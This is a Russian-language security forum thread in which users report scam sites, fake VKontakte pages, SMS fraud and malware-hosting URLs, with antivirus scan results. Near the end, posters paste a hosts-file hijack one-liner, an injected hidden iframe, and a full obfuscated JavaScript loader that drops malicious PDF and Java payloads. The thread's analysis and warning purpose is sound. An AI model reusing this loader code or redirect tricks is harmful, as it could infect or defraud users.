:"http://": msk-ru.ru/download.php?fid=kc1ep8j150fe7via.zip
Извините, если не в той теме... это рассылают Вконтакте 
Результат доктор веб http://online.us.drweb.com/cache/?i=...4d8fac5da81d30
У АВ Касперского есть такая запись в базах? А то как-то скачивать не хочется
Если можно, дайте ссылку на ВТ, спасибо!

----------


## valho

Знает
http://www.virustotal.com/analisis/0...cde-1245692360

----------


## Никита Соловьев

Да почти все знают! Спасибо!

----------


## bolshoy kot

> msk-ru.ru/download.php?fid=kc1ep8j150fe7via.zip
> Извините, если не в той теме... это рассылают Вконтакте 
> Результат доктор веб http://online.us.drweb.com/cache/?i=...4d8fac5da81d30
> У АВ Касперского есть такая запись в базах? А то как-то скачивать не хочется
> Если можно, дайте ссылку на ВТ, спасибо!


Что же он делает? И что скажете про "coolyoutubeproxy"?

----------


## Никита Соловьев

:"http://": wapres.ru/wup2/uploads/files/por.jar
"Крутой новый Jimm для мобильника"[/B]
Доктор веб: http://online.us.drweb.com/cache/?i=...487008bd07134d
Это рассылают по аське довольно часто...

----------


## bolshoy kot

Кстати, о вирусе, напавшем на "spoolsv.exe".
Вот о нем вроде:
http://forum.drweb.com/index.php?showtopic=280870
На второй странице такие же иконки.

*Добавлено через 2 минуты*

_http://wap.jaff.ru/files/Anonim_SMS.jar

----------


## bolshoy kot

poshalim.name
Вот обсуждение http://ruadult.biz/f8/kak-eto-nazvatue-2407/
Не закрываемое окно!

----------


## valho

novalexfinance.com
Хайп, подписан Comodo и застрахован на 1000000$, уже видел здесь тему про хайпы http://virusinfo.info/showpost.php?p=221062&postcount=9
В нагрузку того что они ещё подписывают магазины где продают фальшивые антивирусы, всё больше и больше пропадает желание пользоваться их продуктами

*Добавлено через 17 минут*

http://www.capable.ru/?p=42

----------


## valho

spamvragam.ru



> У каждого из нас есть свои враги или люди, которые, мягко говоря, по той или иной причине нам не нравятся. Живя в Интернете каждый день, встречаешь массу интересных и добрых людей, но не всегда общение проходит гладко. Из 10 собеседников обязательно найдется то, кто будет против вас, ваших идей и принципов, тот, кто постарается изо всех сил испортить ваше настроение, подчас просто из-за своей гнилой натуры.
> 
> Часто мы заказываем всевозможные услуги, обращаемся к админам сайтов и форумов, получаем не то, что нам обещали или нарываемся на жесткую грубость. Чем дольше мы живем, тем шире становится круг наших врагов и "доброжелателей".
> 
> В сети наказать обидчика, как правило, бывает практически невозможно. Наш сайт сделан, чтобы помочь Вам.
> 
> Мы решили собрать базу емаил адресов плохих людей, организаций, непонятных структур и всякого рода негодяев. Мы предлагаем Вам добавить емаил вашего врага в нашу спам базу.
> 
> По мере роста спам базы у вас появится возможность ее увидеть. Внимание администрация сайта не сотрудничает с хакерами и смап рассыльщиками. Мы придерживаемся жесткой политики антиспам, естественно для нормальных людей, чего нельзя сказать о наших врагах.

----------


## Elena

Извините, если не в том разделе пишу, более подходящего не нашла. Мне где-то у Вас попадалось, куда отправлять подобную информацию. Но что-то не нахожу. Взгляните, пожалуйста, на сайт. http://surname.litera-ru.ru/
Касперский меня туда не пускает категорически, говорит, что "объект заражен Trojan-Downloader.JS.Iframe.xa", а раньше (месяца три назад) пускал свободно.

----------


## senyak

> Веб-сайт заблокирован!
> G Data InternetSecurity 2010: отказано в доступе к этому веб-сайту.
> Страница содержит зараженный код: Trojan.Script.7181 (Engine A), VBS:Malware-gen (Engine B).


Тоесть, и Аваст, и BitDefender видят на сайте вирус

----------


## Alexey P.

Правильно видят, в конце страницы внедренный троянский скрипт, декодируется в iframe.

----------


## Elena

Интересно, специально или нет?
Там поля поиска гениалогической специфики, довольно посещаемый сайт.
Народ ходит косяками. Я не рискнула. Себе дороже.

----------


## Alexey P.

В каком смысле специально ? То, что не случайно, это уж точно  :Smiley: .
Вероятнее всего закладка внедрена не авторами страницы, в смысле сайт взломан и инфицирован.

 Правда, этот iframe нерабочий сейчас (ссылка в нём не работает), но он есть.

----------


## valho

Ну да что то есть
http://www.virustotal.com/analisis/7...4ad-1247413339
Похоже это кто то спамит так из дорвеев

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## senyak

Прошу проверить сайт провайдера evpanet.com 
Аваст находит там каку



> Веб-сайт заблокирован!
> G Data InternetSecurity 2010: отказано в доступе к этому веб-сайту.
> Страница содер&жит зараженный код: HTML:Iframe-inf (Engine B).

----------


## valho

> Прошу проверить сайт провайдера evpanet.com 
> Аваст находит там каку


Мы его уже проверяли полгода назад  :Cheesy:  , правда тогда ещё не умели особо это делать, но щас мы немного подучились и можем посмотреть посерьёзнее. Правда чуть попозже...

----------


## senyak

Уже поздно. Сайт поправили, все хорошо

----------


## senyak

javagala.com/?ref=5142450 - вирусы, да?

----------


## senyak

Косим под контакт - goldleto.ru/bonus/

*Добавлено через 2 минуты*

Пришло в асю



> Requested URL:	4pok.cn/10199/foto.jar
> Information	Contains recognition pattern of the JAVA/Boxer.1 Java virus


*Добавлено через 1 минуту*

Пришло в асю



> Requested URL:	4pok.cn/10199/foto.jar
> Information	Contains recognition pattern of the JAVA/Boxer.1 Java virus


*Добавлено через 45 минут*

За весь день Авира тихо, не говоря мне, заблокировала сайты. Что на них? Опять ложняки?




> 19.07.2009,22:14:33 [INFO] WebGuard was enabled
> 19.07.2009,22:16:36 [DETERMINE] [63] The URL (http://s1.mail.ru/sense.html) has been blocked.
> 19.07.2009,22:37:18 [DETERMINE] [775] The URL (http://100.topnews.ru/count.php?id=18) has been blocked.
> 19.07.2009,22:50:27 [DETERMINE] [870] The URL (http://100.topnews.ru/count.php?id=18) has been blocked.
> 19.07.2009,22:57:55 [DETERMINE] [1081] The URL (http://100.topnews.ru/count.php?id=18) has been blocked.
> 19.07.2009,23:09:23 [DETERMINE] [1254] The URL (http://100.topnews.ru/count.php?id=18) has been blocked.
> 19.07.2009,23:14:29 [DETERMINE] [1565] The URL (http://adv.fraza.ua/www/delivery/afr.php?zoneid=10) has been blocked.
> 19.07.2009,23:14:29 [DETERMINE] [1566] The URL (http://s.fraza.ua/) has been blocked.
> 19.07.2009,23:14:29 [DETERMINE] [1572] The URL (http://adv.fraza.ua/www/delivery/afr.php?zoneid=12) has been blocked.
> ...


Если я правильно понял, это счетчики посещаемости...

----------


## senyak

Прошу проверить сайт и содержимые файлы на нем - jabox.ru/

----------


## valho

> Прошу проверить сайт и содержимые файлы на нем - jabox.ru/


На этом IP ещё есть сайтов 20, одна порнография завязанная на партнёрках

----------


## valho

meteoinfo.ru
Неужели так трудно убрать это? Просто поразительно  :Shocked: 

Странно, теперь там адрес поменялся с kit77.biz на but77.biz

----------


## Buldozer

:"http://": vww.zagaday.ru
Очередной развод на бабки. Кликнул по рекламе. Тот кто в это действительно поверит, тот лох :Smiley:

----------


## valho

> Уважаемые партнёры. Ваш бизнес с нами становится ещё стабильнее и прибыльнее: теперь преимущество 8test.ru в том, что у нас подключена мощнейшая защита от ДДОС атак. Но не только! Все что нас не убивает, делает нас сильнее. Мы умеем превращать нечестные выпады наших конкурентов в вашу чистую прибыль. Мы поднимаем минимальный процент отчислений с 75% до 80%! Выполняя пожелания многих наших партнёров, ваша прибыль растёт. Если ваш рейт на данный момент составляет 75%, вам следует всего лишь написать тикет, и мы с удовольствием увеличим его до 80%. Напоминаем, что в скором времени вас ожидают приятные нововведения в системе. Мы создаём самые выгодные и стабильные условия для работы. С уважением, администрация 8test.ru


Пару раз подержал Ctrl+F5 выдало такое -



> 503 Service Temporarily Unavailable


 :Cheesy:

----------


## strawser

http://kruchenet.ru/lib/Book-20-143.html
И так со всеми книгами здесь. В сайт, видно, вложили много труда. Но, все - равно, долго что-то он существует.

----------


## Никита Соловьев

Не Trojan-Downloader.Win32.Adload.gxt случайно? Как в этой теме

----------


## strawser

Очень похоже.

----------


## valho

dividend-center.net, клонов много было
Инвестиции, не так часто встретишь людей которые себя не скрывают. С очень большой вероятностью эти люди могут скоро даться в бега, как обычно кинув всех. Своё видео они выложили в интернете
http://www.youtube.com/watch?v=ah830-T8UY8
http://rutube.ru/tracks/2001440.html...true&bmstart=4
http://www.youtube.com/watch?v=TwDyV...layer_embedded
http://www.youtube.com/watch?v=PgrL4...layer_embedded

----------


## Buldozer

Что по ссылке?

хттп://mirtesen.ru/n/1964606216

----------


## Lexxus

*Buldozer*, это

----------


## Buldozer

Похоже чья-то реферальная ссылка на соц. сеть

----------


## valho

> У нас Вы можете купить паспорт РФ, а также окажем помощь в  покупке или оформлении загран паспорта РФ.
> 
>        Можете купить паспорт РФ с вашей фотографией но с чужими ФИО (переклейка. Данный папорт не нужно проводить по Бд МВД.
> 
>        Можете купить паспорт полностью с вашими ФИО и фотографией. (чистый бланк) и заказать проводку по Бд МВД.
> 
>       Прописка в паспорте возможна только Московская область, г.Москва. г.Санкт-Петербург. 
> 
>         Конфиденциальность гарантируется! Никакие данные не будут переданны третьим лицам! Все логи удаляются каждые 10 мин!





> Срочная покупка паспорта. Куплю паспорт или паспорта Российской федерации для переклейки, обращайтесь? через раздел "Контакты".


Это скорей всего развод, не говоря уже об остальном  :Wink: 

*Добавлено через 5 часов 55 минут*

Хотел вот ещё спросить, а то неукого и негде.
Кто нибудь такие фотки встречал? А то у меня была целая куча но не догадался увеличить их.

----------


## Joyman79

Походу СМС-мошенники
написано 5 рублей а в реале наверное 1000
Ссылки лезут автоматом через рекламные баннеры
Надеюсь вирусов там нету.

http://www.thevideosex.com/
http://ooovideo.com/

----------


## strat

Опять набор текстов на дому, пришло письмо от [email protected] с вложениями Вакансия.doc и Вакансия.docx




> Здравствуйте Уважаемый Соискатель. 
> 
> МЕНЯ ЗОВУТ ЕЛЕНА СЕРГЕЕВА .ПРЕДЛАГАЕМ ВАМ ТРУДОУСТРОЙСТВО НА ДОМУ.
> В СВЯЗИ С УВЕЛИЧЕНИЕМ РАБОТ МЫ ПРОВОДИМ НАБОР СОТРУДНИКОВ НА ДОЛЖНОСТЬ НАБОРЩИК ТЕКСТОВ НА ДОМУ. НАБОР НА ВАКАНСИЮ ОГРАНИЧЕН.
> РАБОТА БУДЕТ ЗАКЛЮЧАТЬСЯ В СЛЕДУЮЩЕМ: 
> ВЫ БУДЕТЕ ПОЛУЧАТЬ ПО ЭЛЕКТРОННОЙ ПОЧТЕ ТЕКСТОВЫЕ ФАЙЛЫ, В ГРАФИЧЕСКОМ ВИДЕ (JPG, GIF, BMP). ВАМ НАДО БУДЕТ НАПЕЧАТАТЬ СОДЕРЖИМОЕ ГРАФИЧЕСКИХ ФАЙЛОВ В ТЕКСТОВЫЕ ФАЙЛЫ: DOC ИЛИ TXT.
> 
> ...
> 
> ...


 ну и так далее

сайт mailmedia.ru перекидывает на _http://pstmedia.ru/ но и тот недоступен, поиск по первым строкам письма вывел еще на пару сайтов _http://botanik1972.narod.ru/
_http://txtpechat.ya.ru/replies.xml?item_no=1&ncrnd=7532

так убивать или совсем?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## PavelA

Ссылки желательно убивать.

----------


## senyak

Вообщем, и смотреть-то нечего - ok-da.com/img/foto35.gif

http://www.virustotal.com/ru/analisi...f06-1253715640

*Осторожно!*

----------


## Rampant

Хм..., а у меня другие сведения с ВТ.

----------


## Alex_Goodwin

Несколько раз в день сэмпл меняется, разное раздают.

----------


## valho

что то заметил тоже что очень часто меняют, по крайне мере за последние часов 5 уже два раза

----------


## DefesT

megavk.blogspot.com/search?q

----------


## Alex_Goodwin

> megavk.blogspot.com/search?q


http://www.virustotal.com/ru/analisi...98d-1253863653

----------


## DefesT

Гляньте...
aboutvk.ru
aboutvk.ru/podarkivk.exe

----------


## Torvic99

Докторовский онлайн проверяльщик сказал - 


> *Проверка: h..p://aboutvk.ru/podarkivk.exe
> Версия антивирусного ядра: 5.0.0.12182
> Вирусных записей: 652398
> Размер файла: 14.50 КБ
> MD5 файла: cbc8b9078e8fef66532447465fb0ccef*
> 
> h..p://aboutvk.ru/podarkivk.exe infected with Trojan.Hosts.144

----------


## Гриша

Троянская сущность в 2 строках:

1. Дропнул батник
2. Отредактировал hosts

Новый домен уже под обстрелом...

----------


## Lexxus

*Гриша*, нда  :Smiley: 
Тогда прикладываю вирус к Linux.



```
echo 92.xxx.xxx.xxx www.vkontakte.com >> /etc/hosts
```

 :lol: 

Запускать под админом ^^

----------


## Kuzz

Кто там еще хочет "слить" свои логин-пароль?

----------


## DefesT

...Можно в коллекцию добавить...
malikovs.ru
vkontakte.awardspace.co.uk/
vkfree.blogspot.com/
prizytut.ru/
vk-darimgolosa.ru
d4mk0.byethost13.com/bonus/bonus/

----------


## valho

> ...Можно в коллекцию добавить...





> Необходимо отправить SMS с текстом *xxxxxxxx* на номер *3649** и в течении 5 минут на Ваш баланс будет зачислен Ваш денежный приз.
> * Стоимость SMS сообщения на номер 7122 состовляет 5 руб.


ну и бред там

----------


## Br0m

знакомая позвонила, пришло письмо со ссылкой на сайт там все по английски что-то типа вы получили инвайт на 
l i\y nkin.com на слух не понял - шо це таке? я так подозреваю, либо фишинг либо доунлоадер спецы, гляньте пожалуйста

----------


## valho

> знакомая позвонила, пришло письмо со ссылкой на сайт


Если как я понял эта та ссылка, то там используется всплывающее окно на некую поисковую систему которая делает вот это 



> Вторжение через веб-браузер, иногда называемое атакой на браузер или непроизвольной загрузкой – это вид вредоносного кода, использующий уязвимости операционной системы или фрагмента программы для изменения настроек браузера без ведома пользователя.


 и подсовывание результатов поиска на мошеннические ресурсы

----------


## Ingener

Мне сегодня в друзья В Контакте постучались со следующим сообщением:



> ***
> Сообщение:
> Хочешь прочитать смс и просмотреть звонки любого мобильного телефона?
> Воспользуйся контролером телефонов!
> Ссылка на контролер: h**p://contral.ru
> Не давай себя обманывать!


Вот данные по проверке этой ссылки:



> h**p://contral.ru перенаправляет на h**p://smsperehvat.com/?subid=10889
> 
> h**p://smsperehvat.com/?subid=10889 перенаправляет на h**p://odnotrahniki.com/?cheat_codes=idkfa
> 
> h**p://odnotrahniki.com/?cheat_codes=idkfa перенаправляет на h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=1
> 
> h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=1 перенаправляет на h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=2
> 
> h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=2 перенаправляет на h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=3
> ...


В статусе у этого пользователя написано:



> Нашелся классный сайт, через который можно читать смс и смотреть звонки ЛЮБОГО мобильного телефона! Не даём себя обманывать! Ссылка h**p://vcontrole.ru, работает всё отлично!!


Вот данные по проверке этой ссылки:



> h**p://vcontrole.ru перенаправляет на h**p://smsperehvat.com/?subid=10893
> 
> h**p://smsperehvat.com/?subid=10893 перенаправляет на h**p://odnotrahniki.com/?cheat_codes=idkfa
> 
> h**p://odnotrahniki.com/?cheat_codes=idkfa перенаправляет на h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=1
> 
> h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=1 перенаправляет на h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=2
> 
> h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=2 перенаправляет на h**p://odnotrahniki.com/?cheat_codes=idkfa&drgn=3
> ...


Наверно таким макаром они куки тырят.

----------


## valho

> Наверно таким макаром они куки тырят.


Нет, это они так друг друга ддосят и ещё что то, а у этой странной dragonara.net как раз сервис есть по защите таких

----------


## Lexxus

*Ingener*, даже невооруженным глазом видно, что там весь сайт один сплошной рисунок  :Smiley:  активна только верхняя часть.

----------


## Infernal_lightning

Пришло от одного из контактов:



> Я с сегодняшнего дня шпион. ))) Вот этот сервис хттп://u.nu/522n3 позволяет просматривать последние смски и звонки любого абонента Европы. Просто вводишь номер телефона и жмешь "получить информацию". Попробуй, развлечешься "на ура" )))


Онлайн проверка Dr.Web'ом:



> хттп://u.nu/522n3 перенаправляет на хттп://gsmspytds.ru/?r=2505
> хттп://gsmspytds.ru/?r=2505 перенаправляет на хттп://spion-phone.ru/?r=2505
> Проверка: хттп://img.spion-phone.ru/js/script.js
> Размер файла: 108.15 КБ
> MD5 файла: eacb5bcabaae4d031ab18b08ff61b7bb
> хттп://img.spion-phone.ru/js/script.js - Ok
> Проверка: хттп://spion-phone.ru/?r=2505
> Версия антивирусного ядра: 5.0.0.12182
> Вирусных записей: 698746
> ...


Ну и немного другой адрес...
хттп://u.nu/235n3



> хттп://u.nu/235n3 перенаправляет на хттп://u10.contralor.ru/
> Проверка: хттп://u10.contralor.ru/jquery-1.3.2.js.txt
> Размер файла: 117.93 КБ
> MD5 файла: 7b7ece4224616a0eb48bf16057e15e77
> хттп://u10.contralor.ru/jquery-1.3.2.js.txt - Ok
> Проверка: хттп://u10.contralor.ru/jquery.selectdecorator.js
> Размер файла: 2496 байт
> MD5 файла: eb3ef082d3a7bc24ee276b834e05ec07
> хттп://u10.contralor.ru/jquery.selectdecorator.js - Ok
> ...

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Lexxus

*Infernal_lightning*, можешь позвонить в Украину по этому номеру
+3 8050 5397412

И сказать, что его сайт (spion-phone.ru) не работает (или туфта, как больше нравится)  :Smiley:

----------


## Infernal_lightning

> И сказать, что его сайт (spion-phone.ru) не работает (или туфта, как больше нравится)


А ведь действительно...Активной является лишь часть "Контролер телефонов" кликая на которую мы попадаем...на spion-phone.ru. И ведь правда, туфта))

----------


## valho

8coins.ru

----------


## valho

:"http://": vasja-pupkin.ru/post_1237962576.html



> Это даже не просто надурилово, это кидалово! Или, выражаясь литературным языком, мошенничество.
> 
> Описание весьма заманчиво: "Если вы расcчитываете зарабатывать тут миллионы, то вынуждены Вас разочаровать. Это не то место. Но если Вам достаточно зарабатывать от 12 до 84 рублей каждый день, затрачивая всего ПАРУ МИНУТ, то этот проект именно для Вас". Якобы с помощью своего IP-адреса ты что-то запускаешь на сервере, за что тебе начисляется 12 рублей. То есть это описание по принципу работы напоминает пресловутые "автосерфинги" и может сбить с толку...
> 
> Однако, если набрать в поисковике часть текста или адрес сайта, то наткнёшься на такие вот отзывы: "Очередной лохотрон на смс. После регистрации через несколько дней сообщается что нужно послать смс на "аунтефикацию" во избежании кражи денег, стоимость смс большая. Кидалово!"
> 
> Ещё раз советую воспользоваться возможностями плагина WOT для Firefox - там эти сайты отмечены как опасные. Если же красный кружок WOT-рейтинга не достаточно убедителен, можно почитать комментарии и удостовериться...
> 
> Сайты эти, насколько я понял, растут как грибы после дождя, но адреса примерно такого вида, как в заголовке. Реклама их идёт даже на rabota.ru!
> ...



Надпись на стене заинтересовала, чувак видимо тоже где то вычитал



> 1. Напишите в документе word: Я хочу избежать службу в армии ,и нажмите проверку орфографии.
> 
> 2. Создайте документ в Word и наберите: = rand (200,99)
> нажмите Enter и удерживайте 3 секунды. Этого не могут объяснить даже в Мicrosoft
> 
> 3. Раскрыт новый заговор против демократии и гражданского общества. Только что. Если в русском MS-Word написать фразу ”правоспособность-способность лица иметь гражданские права и нести обязанности”, он немедленно закрывается, без объяснения причин. Ибо нефига. Большой брат следит за нами.
> 
> 4. Большими буквами напечатайте: Q33 NY. Это номер первого самолета, влетевшего в Близнецов. Выделите Q33 NY Измените размер до 48 Измените шрифт на WINDINGS (WINDINGS 1) Q33 NY
> 
> 5. Если на рабочем создать папку и назвать её "con"(это ботан по-американски), то название не воспримится, ибо Бил Гейтс не очень любил, когда его называли ботаном, вот и поставил запрет.

----------


## ScratchyClaws

> Надпись на стене заинтересовала, чувак видимо тоже где то вычитал


баян  :Smiley:  к счастью, в отличие от лохотронов, абсолютно безобидный

----------


## valho

> баян  к счастью, в отличие от лохотронов, абсолютно безобидный


Неа  :Smiley:  У меня на Office XP вводиш - правоспособность-способность лица иметь гражданские права и нести обязанности
то он сразу закрывается если на новую строку перейти или шрифт поменять, con тоже не создаётся, а если = rand (200,99) ввести то там про эти булочки с ядом выводится несколько сотен страниц и всё начинает глючить.

*Добавлено через 1 час 15 минут*

В принципе 1,2,3,5 считать баяном так как можно найти объяснение, особенно про con. 
Только не пойму почему когда я пишу вот эту самую надпись ”правоспособность-способность лица иметь гражданские права и нести обязанности” у меня word вылетает?  :Sad:

----------


## Torvic99

> Только не пойму почему когда я пишу вот эту самую надпись ”правоспособность-способность лица иметь гражданские права и нести обязанности” у меня word вылетает?


У меня 2003 офис - ничего не вылетает, а в хр года 3 назад вылетало - это типа баго-фича такая.

----------


## Kuzz

> Только не пойму почему когда я пишу вот эту самую надпись ”правоспособность-способность лица иметь гражданские права и нести обязанности” у меня word вылетает?


Внутренний глюк проверки правописания (похоже)
В 2000-м офисе такие последствия были от фраз начинающихся с тире и заканчивающихся точкой с запятой

----------


## valho

Посмотрел по поисковику, да там это аж с 2005 года обсуждалось, похоже это всё таки глюк. Зашёл называется посмотреть на страничку в контакте, чуть не повёлся  :Smiley:

----------


## Joyman79

:"http://": vkontakte24.net - маскировка под известную социальную сеть.

----------


## Dr.

justlearn.envy.nu
Файлик vokontakte.scr 
http://www.virustotal.com/ru/analisi...713-1256680207
при запуске создает в корне диска скрытые: autorun.inf([AutoRun] Open=1.exe Action=Росмотр файлов) и 1.exe, отключает отображение скрытых файлов, блокирует vkontakte.ru(через hosts), прописывается в автозапуск(создает ключ в HKLM). Может и еще чего делает, дальше не смотрел. Больше на шутку какую-то похоже.

----------


## Winsent

> Здравствуйте, winsent.
> 
> Администратор сайта Обсуждаем.ru (_http://www.obsuzhdaem.ru) создал для Вас аккаунт. Вы можете войти на сайт _http://www.obsuzhdaem.ru/user используя следующие имя пользователя и пароль:
> 
> имя пользователя: winsent
> пароль: 123456
> 
> -- Обсуждаем.ru


Зачем и для чего мне администратор создал учётную запись, если надо я бы и сам смог  :Smiley:

----------


## valho



----------


## Ingener

Сейчас изучаю программу Malzilla - вот выдернул эксплойт из вот этого сайта:
h**p://o*h*t*a*s.b*i*z/p*r*e*v*i*e*w/i*n*d*e*x.p*h*p

Вот расшифрованный код эксплойта:


```
<script>
...
</script>
```

Вот результат на VT:
http://www.virustotal.com/ru/analisi...b1f-1257093014

P.S.: не знаю точно можно ли постить подобные вещи - если что не так прошу модераторов сделать замечание - подправлю...

----------


## Rampant

*Ingener*, незнаю как к вашему посту, отнесутся модеры, но вот G Data реагирует вот так))



> Вирус: VBS:SnapshotView-A [Expl] (Engine B)
> 
> Была попытка получить доступ к зараженному
> файлу.
> 
> Файл: showthread[1].php
> Список: C:\Documents and Settings\Valera\Local Settings\Temporary Internet Files\Content.IE5\S62HOV29

----------


## anton_dr

> h**p://o*h*t*a*s.b*i*z/p*r*e*v*i*e*w/i*n*d*e*x.p*h*p


Для таких ссылок есть смайлик  

```
:http:
```

Убираете http:// и www перед ссылкой. Оставляете только


```
:http:ohtas.biz/preview/index.php
```

----------


## PavelA

con - консоль, зарезервированное слово. Ранее применялось в Дос-командах, особенно в autoexec для установки кодовой страницы.

----------


## Ingener

Вот ещё один сайт с эксплойм (которого мало ещё кто детектит):
 :"http://": gogozinger.com/bu1/?t=4ae75d95179f8
Вот результат на VT:http://www.virustotal.com/ru/analisi...800-1257102709

А эксплойт на этом сайте вообще почти никто не детектит:
 :"http://": ontvertenchio.com/vsetakoe/?da137fdb38cdc4beecaa5378f85a3e91
Вот результат на VT:http://www.virustotal.com/ru/analisi...d64-1257103226
Странно почему-то Avira на VT его не задетектила - хотя у меня на ПК Avira PSS 9 его детектит как JS/Dldr.LuckySplo.Q

Вот ещё сайтик с эксплойтом:
 :"http://": proanalytics.cn/frag2/show.php
Вот результат на VT:http://www.virustotal.com/ru/analisi...bc0-1257103992

----------


## Rampant

*Ingener*, ну значит, я не зря выбрал G Data, как постоянную защиту)

----------


## Lexxus

Пришло через ICQ (Стоило всего лишь выставить, что я живу в России)




> Мне Оля сайт скинула, а я не разбираюсь платный он или нет (((( помоги плз!!!! Алька.
> inparadise.org.ru


Кто нибудь, разберитесь... "платный он или нет"  :lol: 

Естессно, ни с какими Альками я не знаком  :Smiley:

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Ingener

> Пришло через ICQ (Стоило всего лишь выставить, что я живу в России)
> 
> 
> 
> Кто нибудь, разберитесь... "платный он или нет" 
> 
> Естессно, ни с какими Альками я не знаком


Ссылка на якобы порносайт (ничего зловредного там нет) - только фишинг:



> ВВЕДИ СВОЙ НОМЕР ТЕЛЕФОНА
> ЧТОБЫ ПОЛУЧИТЬ ДОСТУП
> 
> КАЧАЙ ВИДЕО 24 ЧАСА БЕСПЛАТНО ПРЯМО СЕЙЧАС 
> 
> Вводите свой реальный номер телефона, на него придёт бесплатная смс с кодом доступа.





> ВНИМАНИЕ! Для отмены подписки отправьте слово STOP на:
> для абонентов МТС - номер 770640 (бесплатно)
> для абонентов других операторов - номер 4440 (стоимость сообщения около 1,5 рублей)





> В случае проблем с подпиской
> звоните на номер: 88003339008


Похоже очередной развод какой-то...  :Smiley: 
http://smscost.ru/number/770640
http://smscost.ru/number/4440

Вот описание сути этого лохотрона:
http://forums.drom.ru/habarovsk/t1151264796.html

----------


## Torvic99

> Естессно, ни с какими Альками я не знаком


О мне от этой Альки стока всякого гавна в аську лезит.

----------


## Ingener

Вот очередная подборка сайтов с эксплойтами:
 :"http://": arxivblog.com
Результат на VT:
http://www.virustotal.com/ru/analisi...4f7-1257264118
 :"http://": dom0cn.cn/arend_13/index.php?spl=2
Результат на VT:
http://www.virustotal.com/ru/analisi...456-1257265605
 :"http://": agofa.cn/x150/xx.html
Результат на VT:
http://www.virustotal.com/ru/analisi...c97-1257266411

----------


## Rampant

По последнему адресу, у меня немного другие результаты - G data движок B (Avast)



> 1
> Вирус: HTML:IFrame-CR [Trj] (Engine B)
> Была попытка получить доступ к зараженному
> файлу.
> Файл: arxivblog_com[1].txt
> Список: C:\Documents and Settings\Valera\Local Settings\Temporary Internet Files\Content.IE5\XXD7INS0
> 
> Вирус: Trojan.Generic.IS.554547 (Engine A)
> Была попытка получить доступ к зараженному
> ...


Вот по всем адресам))

----------


## Ingener

> По последнему адресу, у меня немного другие результаты - G data движок B (Avast)


Иногда такое бывает, антивири на VT не детектят, а на ПК детектят - может в настройках дело или в базах - тем более на VT я залил расшифрованный скрипт, а в зашифрованном виде (в котором он лежит на сайте) - на VT его вообще почти никто не детектит:
http://www.virustotal.com/ru/analisi...c50-1257268660

----------


## Virtual

по адресу
 :"http://": domlustr.ru/katalogi/Reccagni_Angelo_2009/general.htm?index.htm
инжектирован код


```
<div style="display:none">enkkohdqplucsinvfagdegrvtmfenxu<iframe width=694 height=444 src="http://age-t./деактив/ru:8080/index.php" ></iframe></div></td>
```

еще сегодня в обед отдавал зараженный пдф /уязвимость в акробате/, (увы отловить саму пдф не успел) устанавливалось (по класификации дрвэб)
Trojan.DownLoad.44006
Trojan.Click.29425
Trojan.Proxy.6207
Trojan.Packed.684
Trojan.Botnetlog.11
 :Cheesy: 
и под конец
Trojan.Winlock.425 //спрашивается нафига лочить курочку  :Wink: 

увы мне сейчас вообще ничего не дает., просто завершает соединение  :Angry: .

ЗЫ кстати все это безобразие под ограниченной учетной записью ничего не испоганило, просто умудрилось загрузить 4х процессорную систему на 100%, что и послужило поводом для проверки.

----------


## valho

Мне тоже ничё не дают, пробовал от себя и из Германии  :Sad:

----------


## Rampant

G data сразу блочит.

----------


## Virtual

есть, поймал с зловредного сайта данные  :Wink: . отдает как-то странно толи с каждого ип раз в сутки толи еще как...
кто может разберитесь, //за 100% достоверность не отвечаю ибо фильтры контента могли его малость погрызть  :Sad: .\


```
<html>
<head><title>Jweah13faem0ja6dqj342n53hzg6</title></head><body>
<script>
eval(				function(p,		a,



c,   k  ,   e   ,  d  ) 
 {e  =                   function
	(   
c
   )


{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('w k(){h{5=\'<#&(i&^!$f(#)[email protected]!m(!e^@$\'.3(/@|#|&|\\^|\\!|\\)|\\$|\\(/2,\'\');7=\'<@@!/&[email protected]#f&@(r#$a^^m^e$()^>(\'.3(/@|\\$|\\)|\\^|\\(|&|#|\\!/2,\'\');j=\'[email protected]&o&!(@b(^#[email protected] @@A&&c#!(r#o!&&b)@$a^$t&\'.3(/\\^|\\(|&|@|\\!|\\$|\\)|#/2,\'\');8=\'[email protected])#)d$o)b^e$ #()z#D#$&@[email protected]\'.3(/@|\\^|\\(|\\$|&|\\)|#|\\!/2,\'\');y(i=0;i<6.v.x;i++){4=6.v[i].B;l((4.g(j)!=-1)||(4.g(8)!=-1)){n.p(5+\' q="s/G.C">\'+7)}}}u(9){}h{l(6.H()){n.p(5+\' q="s/E.I">\'+7)}}u(9){}}k();',45,45,'||ig|replace|B53fjjdpq|Wvfl219id|navigator|Iqqptmy|Icih2owkj|L3kv2n8|||||||indexOf|try||Umsjv5|B4fkcsqef|if||document||write|src||pics||catch|plugins|function|length|for|P||name|pdf||java||ChangeLog|javaEnabled|html'.split('|'),0,{}))
</script>
</body>
</html>
```

----------


## valho

> есть, поймал с зловредного сайта данные .


Что то выполняется и куда то записывается вроде  :Wink: 


```
